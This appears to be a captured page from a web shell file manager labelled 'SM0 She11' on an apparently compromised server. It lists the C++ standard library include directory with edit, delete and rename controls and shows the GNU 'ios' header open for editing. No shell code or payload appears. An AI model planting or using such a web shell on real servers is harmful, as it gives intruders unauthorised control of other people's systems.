SM0 She11
Path:
/
/
usr
/
include
/
c++
/
4.8.2
Full Path (server): /usr/include/c++/4.8.2
Create Fil3
Upl04d Fil3
📄 algorithm
[E]
[D]
[R]
📄 array
[E]
[D]
[R]
📄 atomic
[E]
[D]
[R]
📁 backward
Open
[D]
[R]
📁 bits
Open
[D]
[R]
📄 bitset
[E]
[D]
[R]
📄 cassert
[E]
[D]
[R]
📄 ccomplex
[E]
[D]
[R]
📄 cctype
[E]
[D]
[R]
📄 cerrno
[E]
[D]
[R]
📄 cfenv
[E]
[D]
[R]
📄 cfloat
[E]
[D]
[R]
📄 chrono
[E]
[D]
[R]
📄 cinttypes
[E]
[D]
[R]
📄 ciso646
[E]
[D]
[R]
📄 climits
[E]
[D]
[R]
📄 clocale
[E]
[D]
[R]
📄 cmath
[E]
[D]
[R]
📄 complex
[E]
[D]
[R]
📄 complex.h
[E]
[D]
[R]
📄 condition_variable
[E]
[D]
[R]
📄 csetjmp
[E]
[D]
[R]
📄 csignal
[E]
[D]
[R]
📄 cstdalign
[E]
[D]
[R]
📄 cstdarg
[E]
[D]
[R]
📄 cstdbool
[E]
[D]
[R]
📄 cstddef
[E]
[D]
[R]
📄 cstdint
[E]
[D]
[R]
📄 cstdio
[E]
[D]
[R]
📄 cstdlib
[E]
[D]
[R]
📄 cstring
[E]
[D]
[R]
📄 ctgmath
[E]
[D]
[R]
📄 ctime
[E]
[D]
[R]
📄 cwchar
[E]
[D]
[R]
📄 cwctype
[E]
[D]
[R]
📄 cxxabi.h
[E]
[D]
[R]
📁 debug
Open
[D]
[R]
📁 decimal
Open
[D]
[R]
📄 deque
[E]
[D]
[R]
📄 exception
[E]
[D]
[R]
📁 ext
Open
[D]
[R]
📄 fenv.h
[E]
[D]
[R]
📄 forward_list
[E]
[D]
[R]
📄 fstream
[E]
[D]
[R]
📄 functional
[E]
[D]
[R]
📄 future
[E]
[D]
[R]
📄 initializer_list
[E]
[D]
[R]
📄 iomanip
[E]
[D]
[R]
📄 ios
[E]
[D]
[R]
📄 iosfwd
[E]
[D]
[R]
📄 iostream
[E]
[D]
[R]
📄 istream
[E]
[D]
[R]
📄 iterator
[E]
[D]
[R]
📄 limits
[E]
[D]
[R]
📄 list
[E]
[D]
[R]
📄 locale
[E]
[D]
[R]
📄 map
[E]
[D]
[R]
📄 memory
[E]
[D]
[R]
📄 mutex
[E]
[D]
[R]
📄 new
[E]
[D]
[R]
📄 numeric
[E]
[D]
[R]
📄 ostream
[E]
[D]
[R]
📁 parallel
Open
[D]
[R]
📁 profile
Open
[D]
[R]
📄 queue
[E]
[D]
[R]
📄 random
[E]
[D]
[R]
📄 ratio
[E]
[D]
[R]
📄 regex
[E]
[D]
[R]
📄 scoped_allocator
[E]
[D]
[R]
📄 set
[E]
[D]
[R]
📄 sstream
[E]
[D]
[R]
📄 stack
[E]
[D]
[R]
📄 stdexcept
[E]
[D]
[R]
📄 streambuf
[E]
[D]
[R]
📄 string
[E]
[D]
[R]
📄 system_error
[E]
[D]
[R]
📄 tgmath.h
[E]
[D]
[R]
📄 thread
[E]
[D]
[R]
📁 tr1
Open
[D]
[R]
📁 tr2
Open
[D]
[R]
📄 tuple
[E]
[D]
[R]
📄 type_traits
[E]
[D]
[R]
📄 typeindex
[E]
[D]
[R]
📄 typeinfo
[E]
[D]
[R]
📄 unordered_map
[E]
[D]
[R]
📄 unordered_set
[E]
[D]
[R]
📄 utility
[E]
[D]
[R]
📄 valarray
[E]
[D]
[R]
📄 vector
[E]
[D]
[R]
📁 x86_64-redhat-linux
Open
[D]
[R]
Editing: ios
// Iostreams base classes -*- C++ -*- // Copyright (C) 1997-2013 Free Software Foundation, Inc. // // This file is part of the GNU ISO C++ Library. This library is free // software; you can redistribute it and/or modify it under the // terms of the GNU General Public License as published by the // Free Software Foundation; either version 3, or (at your option) // any later version. // This library is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU General Public License for more details. // Under Section 7 of GPL version 3, you are granted additional // permissions described in the GCC Runtime Library Exception, version // 3.1, as published by the Free Software Foundation. // You should have received a copy of the GNU General Public License and // a copy of the GCC Runtime Library Exception along with this program; // see the files COPYING3 and COPYING.RUNTIME respectively. If not, see // <http://www.gnu.org/licenses/>. /** @file include/ios * This is a Standard C++ Library header. */ // // ISO C++ 14882: 27.4 Iostreams base classes // #ifndef _GLIBCXX_IOS #define _GLIBCXX_IOS 1 #pragma GCC system_header #include <iosfwd> #include <exception> // For ios_base::failure #include <bits/char_traits.h> // For char_traits, streamoff, streamsize, fpos #include <bits/localefwd.h> // For class locale #include <bits/ios_base.h> // For ios_base declarations. #include <streambuf> #include <bits/basic_ios.h> #endif /* _GLIBCXX_IOS */
Save